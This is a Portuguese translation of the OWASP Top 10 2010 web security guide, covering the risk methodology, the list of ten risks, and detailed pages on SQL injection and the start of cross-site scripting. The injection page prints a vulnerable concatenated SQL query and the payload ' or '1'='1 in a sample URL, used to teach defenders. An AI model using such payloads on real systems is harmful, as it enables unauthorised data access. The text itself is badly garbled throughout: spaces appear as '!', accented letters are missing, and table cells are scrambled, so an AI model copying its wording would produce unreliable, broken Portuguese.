OwaspTop10 PTPT v2

Notas!desta!
verso
Esta!verso!do!OWASP!Top!10!foi!desenvolvida!como!parte!integrante!da!atividade!conjunta!dos!captulos!
brasileiro!e!portugus!da!OWASP,!em!prol!da!comunidade!de!programadores!e!da!segurana!dos!sistemas!
desenvolvidos!nos!pases!de!lngua!portuguesa.!Este!documento!!baseado!na!verso!OWASP!Top!10!de!
2010.
Participaram!nesta!traduo:
Carlos!Serro!h!carlos.j.serrao@gmail.com
Leonardo!Cavallari!Militelli!h!leonardocavallari@gmail.com
Joaquim!Marques!h!marques@ipcb.pt
Nuno!Teodoro!h!nuno.ilipe.teodoro@gmail.com
Jeronimo!Zucco!h!jczucco@gmail.com
Ricardo!Makino!h!ricardo.nobu@gmail.com
Rafael!Gomes!h!rafael.gomes@uba.br
Paulo!Silva!h!pauloasilva@gmail.com
Joo!Lima!h!joao.lima@blip.pt
Eduardo!Neves!h!eneves@conviso.com.br
A!traduo !deste!documento ! pretendehse! iel ! ao ! texto !original,! tendo ! sido ! introduzidos ! alguns! detalhes!
explicativos!que!esto!dispersos!no!texto,!assumindo,!nalguns!casos,!a!forma!de!notas!de!rodap.
Para!saber!mais!sobre!os!eventos!e!atividades!desenvolvidas!pela!delegao!da!OWASP!em!Portugal,!aceda!!
pgina ! (http://www.owasp.org/index.php/Portuguese) ! ou ! registehse ! na ! lista ! de ! discusso ! OWASPhPT!
(https://lists.owasp.org/mailman/listinfo/owasphportuguese).
Sobre!o!OWASP
Prefcio
O ! software ! inseguro ! est ! a ! minar ! a ! nossa ! sade ! inanceira, ! a ! rea ! da ! defesa, ! da ! energia ! e ! outras!
infraestruturas ! crticas. ! ! medida ! que ! a ! nossa ! infraestrutura ! digital ! ica ! cada ! vez ! mais ! complexa ! e!
interligada,!a!diiculdade!na!construo!de!aplicaes!seguras!aumenta!exponencialmente.!No!!possvel !
continuar!a!tolerar!os!problemas!de!segurana!relativamente!simples,!como!os!que!so!apresentados!no!Top!
10!da!OWASP.!
O! projeto ! Top ! 10! tem! como ! objetivo ! a! sensibilizao !para! a! problemtica !da !segurana ! das ! aplicaes,!
atravs! da! identiicao !de! alguns ! dos ! riscos !mais ! crticos !e! comuns !que! as !organizaes! enfrentam. ! O!
projeto!Top!10!!referenciado!por!muitas!normas,!livros,!ferramentas!e!organizaes,!incluindo!MITRE,!PCI!
DSS,!DISA,!FTC,!e!muitas!outras.!Esta!verso!do!Top!10!da!OWASP!marca!o!oitavo!ano!deste!projeto,!na!sua!
misso!de!sensibilizao!para!a!importncia!dos!riscos!de!segurana!aplicacional.!O!Top!10!da!OWASP!foi!
lanado ! inicialmente ! em ! 2003, ! tendo ! sido ! alvo ! de ! pequenas ! atualizaes ! em ! 2004, ! 2007 ! e ! mais!
recentemente,!em!2010.!
A!OWASP!encoraja!a!utilizao!do!Top!10!para!que!as!organizaes!criem!e!utilizem!aplicaes!seguras,!os!
programadores!possam!aprender!com!os!erros!de!outras!organizaes!e!os!executivos!possam!comear!a!
pensar!sobre!como!gerir!o!risco!de!criar!aplicaes!de!software!nas!suas!empresas.!
No!entanto!o!Top!10 !no! !um!programa!de!segurana!aplicacional!por!si!s.!Indo!mais!alm,!a!OWASP!
recomenda ! que ! as ! organizaes ! estabeleam ! uma ! base ! slida ! de ! formao, ! normas ! e ! ferramentas ! que!
tornem!a!programao!segura,!possvel.!No!topo!dessa!fundao!as!organizaes!podem!integrar!a!segurana!
nos!seus!processos!de!desenvolvimento,!veriicao!e!manuteno.!A!gesto!pode!usar!os!dados!provenientes!
dessas!atividades!para!gerir!os!custos!e!riscos!associados!!segurana!aplicacional.!
Esperamos!que!o!Top!10!da!OWASP!seja!til!para!seus!esforos!de!segurana!aplicacional.!Por!favor,!no!
hesite!em!contactar!a!OWASP!com!as!suas!perguntas,!comentrios!e!ideias,!tanto!de!forma!pblica!para !
OWASPhTopTen@lists.owasp.org!ou!de!forma!privada!para!dave.wichers@owasp.org.!
http://www.owasp.org/index.php/Topten!
Sobre!a!OWASP
O !Open ! Web ! Application ! Security ! Project! (OWASP) ! ! uma ! comunidade ! aberta, ! dedicada ! a ! capacitar ! as!
organizaes!a!desenvolver,!adquirir!e!manter!aplicaes!que!possam!ser!coniveis.!Na!OWASP!!possvel!
encontrar!de!forma!livre!e!aberta:
Ferramentas!de!segurana!aplicacional!e!normas!
Livros!sobre!testes!de!segurana!aplicacional,!desenvolvimento!de!cdigo!fonte!seguro!e!reviso!de!
segurana!desse!mesmo!cdigo!fonte
Normas!de!controlo!de!segurana!e!bibliotecas!
Delegaes/Captulos!locais!espalhados!por!todo!o!Mundo
Pesquisa!do!estado!da!arte
Inmeras!conferncias!espalhadas!por!todo!o!Mundo!
Listas!de!discusso
E!muito!mais...!tudo!em!www.owasp.org!
Todas ! as ! ferramentas ! OWASP, ! documentos, ! fruns, ! e ! as ! delegaes/captulos ! so ! livres ! e ! abertos ! !

participao!de!todos!os!interessados!na!melhoria!da!segurana!aplicacional.!A!OWASP!defende!a!abordagem!
!segurana!aplicacional!como!sendo!um!problema!de!pessoas,!processos!e!tecnologia,!porque!as!abordagens!
mais!eicazes!para!a!segurana!aplicacional!necessitam!de!melhorias!em!todas!estas!reas.!
A ! OWASP ! ! um ! novo ! tipo ! de ! organizao. ! A ! ausncia ! de ! presses ! comerciais ! permite ! ! OWASP ! o!
fornecimento!de!informao!imparcial,!prtica!e!de!baixo!custo!sobre!segurana!aplicacional.!A!OWASP!no!!
ailiada!de!nenhuma!empresa!de!tecnologia,!apesar!de!apoiar!o!uso!informado!de!tecnologia!de!segurana !
comercial.!Da!mesma!forma!que!muitos!projetos!de!software!de!cdigo!aberto,!a!OWASP!produz!diversos!
tipos!de!materiais!de!uma!maneira!cooperativa!e!aberta.
A!fundao!OWASP!!uma!entidade!sem!ins!lucrativos!que!garante!o!sucesso!do!projeto!a!longo!prazo.!Quase!
todos!os!associados!com!a!OWASP!so!voluntrios,!incluindo!a!Direo!da!OWASP,!as!Comisses!Globais,!os!
Lderes!de!Delegaes,!os!Lderes!de!Projetos!e!os!membros!do!projeto.!Apoiamos!a!pesquisa!inovadora!em!
segurana!atravs!da!atribuio!de!bolsas!e!de!infraestrutura!de!suporte.!
Juntehse!a!ns!
Introduo
BemZVindo
Bemhvindo!ao!Top!10!da!OWASP!!Esta!importante!atualizao,!mais!concisa!e!focada!no!risco,!apresenta!uma!
lista!dos!10!riscos!mais!crticos!de!segurana!em!aplicaes!Web.!O!Top!10!da!OWASP!foi!sempre!sobre!
riscos,!mas!esta!atualizao!evidencia!mais!esta!orientao,!fornecendo!ainda!informao!adicional!de!como!
avaliar!estes!riscos!nas!suas!aplicaes.
Para!cada!item!deste!Top!10,!esta!edio!discute!a!probabilidade!de!ocorrncia!geral!e!as!suas!consequncias,!
tambm!usadas!para!aferir!a!gravidade!do!risco.!Esta!edio!inclui!ainda!orientao!sobre!como!veriicar!se!
existem ! problemas ! nesta ! rea, ! como ! evithlos, ! alguns ! exemplos ! de ! falhas ! e ! ligaes ! para ! recursos ! que !
fornecem!informao!adicional.
O!objetivo!principal!do!Top!10!da!OWASP!!o!de!educar!programadores,!designers,!arquitetos!e!organizaes!
acerca!das!consequncias!das!mais!importantes!deicincias!de!segurana!em!aplicaes!Web.!O!Top!10!
fornece!ainda!mtodos!bsicos!de!proteo!contra!reas!de!problemas!de!alto!risco!h!e!fornece!orientaes!
sobre!onde!ir!a!partir!daqui.
Avisos
No!pare!no!10.!H!centenas!de!questes!que!podem!afetar!a!segurana!geral!de!uma!aplicao!Web,!como !
discutido!no!OWASP!Developer's!Guide,!leitura!essencial!no!desenvolvimento!de!aplicaes!Web.!Orientaes!
sobre ! como ! encontrar ! de ! forma ! efetiva ! vulnerabilidades ! em ! aplicaes ! Web ! so ! fornecidas ! no !OWASP!
Testing!Guide! e !OWASP!Code!Review!Guide.!Estes!dois!manuais!tm!sido!atualizados!de!forma!considervel!
desde!a!ltima!edio!do!Top!10!da!OWASP.
Alteraes ! constantes. ! Este ! Top ! 10 ! ser ! continuamente ! modiicado.! Mesmo ! sem ! alterar ! uma! linha! do!
cdigo ! fonte, ! a ! sua ! aplicao ! poder ! icar ! vulnervel ! a ! algum ! risco ! que ! no ! tenha ! sido ! previamente!
identiicado.!Por!favor,!reveja!o!conselho!no!inal!deste!documento!em!Onde!ir!a!partir!de!agora!para!mais!
informaes.
Pense ! de ! forma ! positiva. ! A ! OWASP ! produziu ! o !Application ! Security ! VeriJication ! Standard ! (ASVS)! para!
quando!tiver!acabado!de!procurar!vulnerabilidades!e!pretender!focarhse!em!estabelecer!fortes!controlos!de!
segurana!nas!suas!aplicaes.!Este!documento!serve!de!guia!de!veriicao!para!organizaes!e!revisores!de!
cdigo!fonte.
Utilize!as!ferramentas!de!uma!forma!inteligente.!As!vulnerabilidades!de!segurana!podero!ser!bastante!
complexas!e!enterradas!em!montanhas!(ininitas!pginas)!de!cdigo!fonte.!A!abordagem!com!a!maior!relao!
custohbenecio!para!encontrhlas!e!eliminhlas!,!quase!sempre,!envolvendo!recursos!humanos!especialistas!
e!capazes,!equipados!com!as!melhores!ferramentas.
Considere!uma!mudana!de!rumo.!As!aplicaes!Web!seguras!apenas!so!possveis!quando!!utilizado!um!
ciclo!de!vida!de!desenvolvimento!seguro!de!software!.!Para!aconselhamento!sobre!como!implementar!um!
SDLC!F!Software!Development!LifeCycle!seguro,!a!OWASP!lanou!recentemente!o!OWASP!Software!Assurance !
Maturity!Model!(SAMM)!que!!uma!importante!atualizao!do!OWASP!CLASP!Project.
Agradecimentos
Obrigado!!Aspect!Security!por!ter!iniciado,!liderado!e!atualizado!o!Top!10!da!OWASP!deste!a!sua!conceo !
em!2003.!Igualmente!o!nosso!obrigado!aos!seus!autores!principais:!Jeff!Williams!e!Dave!Wichers.
Queremos ! ainda ! agradecer ! s ! organizaes ! que ! contriburam ! com ! os ! seus ! dados ! de ! prevalncia ! de!
vulnerabilidades!para!esta!atualizao!de!2010:
!Aspect!Security!
!MITRE!!!CVE
!Softtek!
!White!Hat!!Security!Inc.
!
!!!Statistics
Por!im!os!nossos!agradecimentos!vo!para!quem!contribuiu!com!contedos!signiicativos!ou!despendeu!
tempo!a!rever!esta!atualizao!do!Top!101:
Mike!Boberski!(Booz!Allen!Hamilton)
Juan!Carlos!Calderon!(Softtek)
Michael!Coates!(Aspect!Security)
Jeremiah!Grossman!(White!Hat)
Paul!Peteish!(Solutionary,!Inc.)
Eric!Sheridan!(Aspect!Security)
Andrew!van!der!Stock
1 Referehse!!verso!original!em!ingls.
Notas!da!verso
O!que!mudou!de!2007!para!2010?
O!horizonte!de!ameaas!para!aplicaes!web!(aplicaes!baseadas!e/ou!distribudas!atravs!da!internet) !
mudou!com!os!avanos!dos!atacantes,!das!novas!tecnologias!e!com!o!aumento!signiicativo!da!complexidade!
dos!sistemas.!De!forma!a!acompanhar!esta!evoluo!atualizmos!o!Top!10!da!OWASP!periodicamente.!Nesta!
edio!de!2010,!izemos!alteraes!signiicativas,!tais!como:
1)!Explanmos!que!o!Top!10!!a!propsito!dos!10!Riscos!mais!importantes!e!no!das!10!falhas!mais!
comuns.!Veja!os!detalhes!em!"Compreenda!os!Riscos!de!Segurana!Aplicacional",!mais!a!baixo.
2)!Altermos!a!metodologia!de!clculo!da!ordenao!de!forma!a!estimar!o!risco!associado!em!vez!de!
depender!somente!da!frequncia!de!ocorrncia!da!falha.!Esta!alterao!afeta!a!ordem!do!Top!10!como!
poder!ser!observado!na!tabela!que!se!segue.
3)!Substitumos!dois!itens!na!lista:
+!ACRESCENTADO:!A6!!Conigurao!Incorreta!de!Segurana.!Este!item!era!o!A10!no!Top!10!
de!2004:!Gesto!de!Coniguraes!Inseguras,!mas!foi!abandonado!porque!no!foi!considerado!
como!uma!questo!relacionada!com!o!software.!No!entanto,!do!ponto!de!vista!dos!riscos!de!
uma ! organizao ! e ! de ! uma ! perspetiva ! de !prevalncia, ! claramente ! merece ! voltar ! a ! estar!
includo!nesta!lista!estando!desta!forma!de!volta!ao!Top!10.
+!ACRESCENTADO:!A8!h!Redirecionamentos!e!Encaminhamentos!Invlidos.!Este!item!est!a!
entrar!no!Top!10!pela!primeira!vez.!Esta!evidncia!mostrahnos!que!embora!o!risco!associado!
seja!relativamente!desconhecido,!est!a!espalharhse!e!poder!provocar!danos!signiicativos.
h!REMOVIDO:!A3!h!Execuo!de!Ficheiros!Maliciosos.!Este!!ainda!um!problema!signiicativo!
em!variados!ambientes.!Contudo,!a!sua!prevalncia!no!Top!10!de!2007!foi!inlacionado!por!
aplicaes!desenvolvidas!em!PHP,!o!qual!!atualmente!distribudo!com!uma!conigurao!por !
omisso !mais! focada! em! aspetos !de! segurana,! fazendo! baixar! a!relevncia! e! prevalncia!
deste!item.
h!REMOVIDO:!A6!!Perda!de!Informao!e!Tratamento!Incorreto!de!Erros.!Embora!este!risco!
seja!bastante!dominante,!o!seu!impacto!aquando!da!divulgao!do!stack!trace!e!na!informao!
de!mensagens!de!erro,!!tipicamente!mnimo.
OWASP!Top!10!!2007!(Anterior)
OWASP!Top!10!!2010!(Novo)
A2!h!Falhas!de!Injeo
A1!!Injeo
A1!!Cross!Site!Scripting!(XSS)
A2!!Cross!Site!Scripting!(XSS)
A7 ! ! Quebra ! da ! Autenticao ! e ! da ! Gesto ! de!

Sesses
A3 ! ! Quebra ! da ! Autenticao ! e ! da ! Gesto ! de!

Sesses
A4!!Referncia!Insegura!e!Direta!a!Objetos
A4!!Referncia!Insegura!e!Direta!a!Objetos
A5!h!Cross!Site!Request!Forgery!(CSRF)
A5!h!Cross!Site!Request!Forgery!(CSRF)
<Anterior!T10!2004!A10!h!Gesto!de!Conigurao!
Insegura!>
A6!h!Conigurao!Incorreta!de!Segurana!(NOVO)
A8!h!Armazenamento!Criptogrico!Inseguro
A7!h!Armazenamento!Criptogrico!Inseguro
A10!h!Falha!na!Restrio!de!Acesso!a!URL
A8!h!Falha!na!Restrio!de!Acesso!a!URL
A9!h!Comunicaes!Inseguras
A9!h!Proteo!Insuiciente!ao!Nvel!do!Transporte
<No!existia!no!T10!2007>
A10 ! h ! Redirecionamentos ! e ! Encaminhamentos!

Invlidos!(NOVO)
A3!h!Execuo!de!Ficheiros!Maliciosos
<Removido!do!Top!10!2010>
A6!h!Perda!de!Informao!e!Tratamento!Incorreto!
de!Erros
<Removido!do!Top!10!2010>
Riscos!de!Segurana!Aplicacional
O!que!so!riscos!de!Segurana!Aplicacional?
Os ! atacantes ! podem ! recorrer ! a ! um ! leque ! potencialmente ! variado ! de ! abordagens ! na ! utilizao ! da ! sua!
aplicao!com!o!objetivo!de!causar!danos!ao!seu!negcio.!Cada!uma!destas!abordagens!representa!um!risco!
que!poder!ser,!ou!no,!suicientemente!srio!para!justiicar!a!sua!ateno.
Por!vezes!estas!abordagens!so!fceis!de!identiicar!e!de!explorar,!outras!vezes,!so!extremamente!diceis.!
De!forma!semelhante,!os!danos!causados!podem!variar!do!nada!at!uma!situao!em!que!podem!colocar!o!
seu!negcio!em!risco!total.!Para!determinar!o!risco!para!a!sua!organizao,!voc!pode!avaliar!a!probabilidade!
associada ! ao ! agente ! de ! ameaa, ! o ! vetor ! do ! ataque ! e ! a ! vulnerabilidade ! de ! segurana ! e ! combinar ! estes!
elementos!com!a!estimativa!de!impacto!tcnico!e!de!negcio!para!sua!organizao.!Os!elementos!referidos,!
todos!juntos,!determinam!o!risco!global!ou!total.
Qual!!o!meu!risco?
Esta! atualizao ! do !Top ! 10! da! OWASP! centrahse! na ! identiicao! dos ! riscos ! mais ! srios ! para! um! leque!
variado ! de ! organizaes. ! Para ! cada ! um ! destes ! riscos ! ! fornecida ! informao ! genrica ! acerca ! da!
probabilidade!e!do!impacto!tcnico,!usando!o!esquema!de!avaliao!baseado!na!Metodologia!de!Classiicao!
de!Riscos!da!OWASP.
Agente!de!
Ameaa
Vetor!de!
Ataque
Prevalncia!da!
Vulnerabilidade
Facilidade!de!
Deteo!da!
Vulnerabilidade
Impacto!
Tcnico
Fcil
Generalizada
Fcil
Severo
Mdio
Comum
Mdio
Moderado
Dicil
Pouco!comum
Dicil
Menor
Impacto!de!
Negcio
No!entanto,!apenas!voc!conhece!as!especiicidades!do!seu!ambiente!e!negcio.!Para!cada!aplicao!pode!
nem!existir!um!agente!de!ameaa!que!possa!realizar!um!ataque!relevante!ou!o!impacto!tcnico!do!mesmo!
pode!nem!ser!muito!signiicativo.!Assim,!voc!ter!que!avaliar!cada!risco!por!si!prprio,!tendo!em!especial!
ateno!os!agentes!de!ameaa,!os!controlos!de!segurana!e!o!impacto!no!negcio!na!sua!empresa.
Embora!as!edies!anteriores!do!Top!10!da!OWASP!se!tenham!centrado!na!identiicao!das!vulnerabilidades!
mais!comuns,!estas!foram!igualmente!concebidas!em!torno!do!risco.!Os!nomes!dos!riscos!no!Top!10!derivam!
do!tipo!de!ataque,!do!tipo!de!vulnerabilidade!ou!do!tipo!de!impacto!causado.!A!OWASP!escolheu!o!nome!mais!
comum!ou!popular,!de!forma!a!alcanar!um!nvel!mais!elevado!de!consciencializao.
Referncias
OWASP
!OWASP!Risk!Rating!Methodology!
!Article!on!Thread/Risk!Modeling!
Externas
!Fair!Informal!Risk!Framework!
!Microsoft!Thread!Modeling!(STRIDE!and!DREAD)!
Top!10!OWASP!de!riscos!de!Segurana!
Aplicacional!Z!2010
A1!!Injeo
As!falhas!de!injeo,!tais!como!injeo!de!SQL,!de!S.O.!(Sistema!Operativo)!e!de!
LDAP,!ocorrem!quando!dados!no!coniveis!so!enviados!para!um!interpretador!
como!parte!de!um!comando!ou!consulta.!Os!dados!hostis!usados!no!ataque!podem!
iludir!o!interpretador!para!que!este!execute!comandos!nohdesejveis!ou!permita!
aceder!a!dados!no!autorizados.
A2!W!Cross!Site!
Scripting!(XSS)
As!falhas!XSS!ocorrem!sempre!que!uma!aplicao!recebe!dados!no!coniveis!e!os!
envia ! para ! um ! navegador ! Web ! sem ! que ! os ! tenha ! validado ! ou ! iltrado!
convenientemente. ! O ! XSS ! permite ! aos ! atacantes ! a ! execuo ! de !scripts! no!
navegador ! da ! vtima ! que ! podem ! ser ! usados ! para ! sequestrar ! informaes ! da!
sesso!do!utilizador,!alterar!edereos!Web!de!forma!perigosa!ou!redirecionar!o!
utilizador!para!endereos!maliciosos.
A3!!Quebra!da!
Autenticao!e!da!
Gesto!de!Sesses
As!funes!de!uma!aplicao!relacionadas!com!autenticao!e!gesto!de!sesses!
so!muitas!vezes!implementadas!de!forma!incorreta,!permitindo!aos!atacantes!
comprometer ! as ! senhas, ! chaves, ! identiicadores ! de ! sesso ! ou ! ainda, ! explorar!
outras!falhas!de!implementao!por!forma!a!assumirem!a!identidade!de!outro!
utilizador.
A4!!Referncia!
Insegura!e!Direta!
a!Objetos
Uma!referncia!direta!a!um!objeto!ocorre!quando!um!programador!expe!uma!
referncia ! para ! um ! objeto ! interno ! ! implementao, ! como ! um ! icheiro, ! uma!
diretoria!ou!chave!de!uma!base!de!dados.!Sem!uma!veriicao!de!controlo!de!
acesso ! ou ! outra ! proteo ! semelhante, ! os ! atacantes ! podem ! manipular ! estas!
referncias!para!acederem!a!informao!nohautorizada.
A5!W!Cross!Site!
Request!Forgery!
(CSRF)
Um!ataque!CSRF!fora!o!navegador!duma!vtima!que!tenha!uma!sesso!ativa!a!
enviar!um!pedido!HTTP!forjado,!incluindo!o!cookie!e!outras!informaes!da!sesso!
(i.e!informao!de!autenticao)!para!uma!aplicao!Web!vulnervel.!Esta!falha!
permite!ao!atacante!forar!o!navegador!da!vtima!a!criar!pedidos!que!a!aplicao!
vulnervel!aceita!como!pedidos!legtimos!oriundos!da!vtima.
A6!W!Congigurao!
Incorreta!de!
Segurana
A ! segurana ! depende ! tambm ! da ! existncia ! de ! coniguraes ! seguras!

especiicamente ! deinidas ! e ! usadas ! na ! aplicao, !frameworks, ! servidor!
aplicacional, ! servidor ! web ! e ! plataforma. ! Todas ! estas ! coniguraes ! devem ! ser!
deinidas,!implementadas!e!mantidas,!sendo!que!muitas!vezes!elas!no!existem!
por!omisso.!Isto!inclui!igualmente!possuir!todo!o!software!atualizado,!incluindo!
todas!as!bibliotecas!de!cdigo!fonte!usadas!pela!aplicao.
A7!W!
Armazenamento!
Criptogrgico!
Muitas ! aplicaes ! web ! no ! protegem ! devidamente ! dados ! sensveis ! tais ! como!

cartes!de!crditos,!SSNs!e!credenciais!de!autenticao,!com!recurso!a!algoritmos!
de ! cifra ! ou ! de! resumo.! Os ! atacantes ! podem ! roubar ! ou ! modiicar ! estes ! dados,!
Inseguro
protegidos!de!forma!deiciente,!para!realizar!roubos!de!identidade,!fraude!com!
cartes!de!crdito!ou!outros!crimes.
A8!W!Falha!na!
Restrio!de!
Acesso!a!URL
Muitas ! aplicaes ! web ! veriicam ! os ! direitos ! de ! acesso ! a ! um ! URL ! antes ! de!

mostrarem!ligaes!e!botes!protegidos.!No!entanto,!as!aplicaes!devem!realizar!
veriicaes!de!controlo!de!acesso!semelhantes!de!cada!vez!que!estas!pginas!so!
acedidas,!caso!contrrio,!os!atacantes!podem!forjar!URLs!e!aceder!a!estas!pginas!
escondidas,!sem!qualquer!controlo.
A9!W!Proteo!
Insugiciente!ao!
Nvel!do!
Transporte
As ! aplicaes ! falham ! frequentemente ! na ! autenticao, ! cifra, ! e ! proteo ! da!

conidencialidade ! e ! integridade ! do ! trfego ! de ! rede ! sensvel. ! Quando ! o ! fazem,!
fazemhno ! muitas ! vezes ! com ! recurso ! a ! algoritmos ! fracos, ! usam ! certiicados!
invlidos!ou!expirados!ou!no!os!usam!corretamente.
A10!W!
RedirecionaW
mentos!e!
EncaminhaW
mentos!invlidos
As!aplicaes!Web!redirecionam!e!encaminham!frequentemente!utilizadores!para!
outras ! pginas ! e ! stios ! web ! usando ! dados ! no ! coniveis ! para ! determinar ! as!
pginas ! de ! destino. ! Sem ! uma ! validao ! adequada, ! os ! atacantes ! podem!
redirecionar ! as ! vtimas ! para ! stios ! de !phishing! ou ! de !malware! ou ! usar ! o!
encaminhamento!para!aceder!a!pginas!no!autorizadas.
A1!Z!Injeo
Agente!da!
Ameaa
Considere!
algum ! que!
possa ! enviar!
dados ! no!
coniveis!
para
!
o!
sistema,!
incluindo!
utilizadores!
externos,!
utilizadores!
internos ! e!
administrah
dores.
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
FCIL
COMUM
MDIO
SEVERO
O!atacante!envia!
um ! ataque!
baseado ! em!
texto
!
que!
explora!a!sintaxe!
do!interpretador!
alvo. ! Quase!
qualquer ! fonte!
de!dados!poder!
constituir ! um!
vetor!de!injeo,!
incluindo ! fontes!
internas.
As !f!!alhas ! de !Injeo
!!
!! ocorrem!
quando ! uma ! aplicao ! envia!
dados ! no ! coniveis ! para ! um!
interpretador.!Estas!apresentam!
uma ! elevada ! prevalncia, ! em!
particular ! em ! cdigo ! fonte!
legado, ! encontrandohse ! com!
regularidade!em!consultas!SQL,!
consultas ! LDAP, ! consultas!
XPath, ! comandos ! do ! S.O.,!
argumentos !de! programas,! etc.!
Estas ! falhas ! so ! fceis ! de!
detetar!aquando!da!veriicao!
do ! cdigo ! fonte, ! mas ! mais!
diceis ! atravs ! de ! testes.!
Scanners ! e ! Fuzzers ! podero!
ajudar!os!atacantes!a!encontrh
las.
As ! injees!
podero!resultar!
em!corrupo!ou!
perca ! de ! dados,!
falhas
!
na!
responsabiliza
o,!ou!negao!de!
servio.
!
A!
injeo ! poder!
levar!ao!controlo!
total
!
do!
endereos ! por!
parte
!
do!
atacante.
Impactos!de!
Negcio
Considere ! o!
valor
!
do!
negcio ! dos!
dados ! afetados!
e!da!plataforma!
em!que!assenta!
o!
interpretador.!
Todos!os!dados!
podem ! ser!
roubados ! ou!
modiicados.!
Pode ! a ! sua!
reputao ! ser!
afetada?
Serei!vulnervel!!injeo?
A!melhor!forma!de!saber!se!uma!aplicao!!vulnervel!!injeo!ser!veriicar!que!toda!a!utilizao!dos !
interpretadores!separa!de!forma!clara!dados!no!coniveis!dos!comandos!e!consultas.!Para!declaraes!SQL!
isto ! signiica ! a ! utilizao ! de ! variveis ! de ! ligao ! em ! todas ! as ! instrues ! preparadas ! e ! procedimentos!
armazenados,!evitando!consultas!dinmicas.
Veriicar!o!cdigo!!a!forma!mais!rpida!e!segura!para!assegurar!se!a!aplicao!usa!interpretadores!de!uma !
forma!segura.!As!ferramentas!de!anlise!de!cdigo,!podem!ajudar!um!analista!de!segurana!a!encontrar!o!uso!
de!interpretadores!e!a!fazer!o!registo!do!luxo!de!dados!atravs!da!aplicao.!Os!testes!de!penetrao!manual!
podero!conirmar!estas!questes!concebendo!modos!de!ataque!que!veriiquem!estas!vulnerabilidades.
A! anlise! dinmica ! e ! automtica ! que ! permita! exercitar ! a ! aplicao ! poder ! fornecer ! alguma ! informao !
adicional!sobre!a!existncia!ou!no!de!algumas!vulnerabilidades!de!injeo!que!possam!ser!exploradas.!Nem!
sempre!os !scanners! conseguem!chegar! aos!interpretadores,!tendo! alguma!diiculdade!em!detetar! se!um!
ataque!foi!feito!com!sucesso.!Uma!m!gesto!de!erros!pode!tornar!a!descoberta!das!vulnerabilidades!de!
injeo!mais!fcil.
Como!evitar!a!injeo?
Prevenir!injees!requer!que!os!dados!no!coniveis!sejam!separados!dos!comandos!e!das!consultas:
1. A!melhor!opo!!usar!uma!API!segura!que!evita!o!uso!por!completo!dos!interpretadores!ou!oferece!
uma ! interface ! parametrizvel. ! Tenha ! especial ! cuidado ! com ! as ! APIs, ! tais ! como ! procedimentos !
armazenados,!que!embora!sejam!parametrizveis,!mesmo!assim!permitem!injeo.
2. Caso ! uma ! API ! parametrizvel ! no ! esteja ! disponvel, ! deve ! iltrar ! com ! todo ! o ! cuidado ! carateres!
especiais!usando!uma!sintaxe!de!iltragem!especica!para!o!interpretador!em!causa.!A ! ESAPI!da!
OWASP!possui!algumas!destas!rotinas!de!iltragem.
3. !igualmente!recomendada!a!validao!da!entrada!de!dados!empregando!estratgias!positivas!ou!
listas ! brancas ! (whitelist),! com! uma! canonizao ! adequada.! No ! entanto ! esta! pode! no ! ser ! defesa!
suiciente!j!que!muitas!aplicaes!necessitam!de!carateres!especiais!aquando!da!entrada!de!dados.!A !
ESAPI!da!OWASP!contm!uma!extensa!lista!de!rotinas!de!validao!de!dados!usando!listas!brancas.
Exemplo!de!cenrio!de!ataque
A!aplicao!usa!dados!no!coniveis!na!construo!da!seguinte!consulta!SQL!vulnervel:
String!query!=!"SELECT!*
FROM!!!!accounts!
WHERE!!custID='"!+!request.get.Parameter("id")!+!"'";
O!atacante!altera!o!argumento!'id'!no!seu!navegador!por!forma!a!enviar!'!or!'1'='1.!Isto!altera!o!propsito!da!
consulta!SQL!fazendo!retornar!todos!os!registos!da!tabela!accounts.
http://example.com/app/accountView?id='!or!'1'='1
No!pior!dos!cenrios!o!atacante!usa!esta!vulnerabilidade!para!invocar!procedimentos!armazenados!especiais!
na!base!de!dados!para!permitir!tomar!o!controlo!total!da!mesma!e!eventualmente!controlar!o!servidor!em!
que!a!base!de!dados!reside.
Referncias!
OWASP
!OWASP!SQL!Injection!Prevention!Cheat!Sheet!
!OWASP!Injection!Flaws!Article!
!ESAPI!Encoder!API!
!ESAPI!Input!Validation!API!
!ASVS:!Output!Encoding/Escaping!Requirements!(V6)!
!OWASP!Testing!Guide:!Chapter!on!SQL!Injection!Testing!
!OWASP!Code!Review!Guide:!Chapter!on!SQL!Injection!
!OWASP!Code!Review!Guide:!Command!Injection!
Externas
!CWE!Entry!77!on!Command!Injection!
!CWE!Entry!89!on!SQL!Injection!
A2!Z!Cross!Site!ScripSng!(XSS)
Agente!da!
Ameaa
Considere!
algum ! que!
possa ! enviar!
dados ! no!
coniveis!
para
!
o!
sistema,!
incluindo!
utilizadores!
externos,!
utilizadores!
internos ! e!
administrador
es.
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
MDIA
GENERALIZADA
FCIL
MODERADO
O!atacante!envia!
scripts! textuais!
que ! exploram ! o!
interpretador!no!
seu ! navegador.!
Quase ! qualquer!
fonte ! de ! dados!
poder!
constituir ! um!
vetor ! de ! ataque,!
incluindo ! fontes!
internas ! tais!
como ! dados ! de!
uma ! base ! de!
dados.
O!XSS!!um!dos!riscos!que!mais!
prevalece ! no ! contexto ! das!
falhas ! de ! segurana ! em!
aplicaes ! web. ! As ! falhas ! XSS!
acontecem ! quando ! uma!
aplicao ! inclui ! dados!
fornecidos!pelo!utilizador!numa!
pgina ! enviada ! para ! o!
navegador ! sem ! que ! alguma!
validao ! ou ! iltragem ! tenha!
sido ! feita ! aos ! dados. ! Existem!
trs!tipos!conhecidos!de!falhas!
XSS: ! 1) !Armazenada; ! 2)!
Reletida; ! 3) !XSS ! baseado ! em!
DOM.
Os ! atacantes!
podero!
executar !scripts!
no!navegador!da!
vtima ! para!
sequestrar!
dados ! da ! sesso!
do ! utilizador,!
alterar ! stios ! de!
forma ! maliciosa,!
inserir ! contedo!
hostil,!
redirecionar ! o!
utilizador,!
sequestrar ! o!
navegador ! do!
Descobrir ! falhas ! XSS ! ! utilizador!
razoavelmente ! fcil ! atravs ! de! usando !malware,!
testes ! ou ! anlise ! do ! cdigo! etc.
fonte.
Impactos!de!
Negcio
Considere ! o!
valor
!
do!
negcio ! do!
sistema!afetado!
e ! de ! todos ! os!
dados ! que ! o!
mesmo!
processa.
Considere!
igualmente ! o!
impacto ! de!
negcio ! da!
exposio!
pblica ! da!
vulnerabilidah
de.
Serei!vulnervel!ao!XSS?
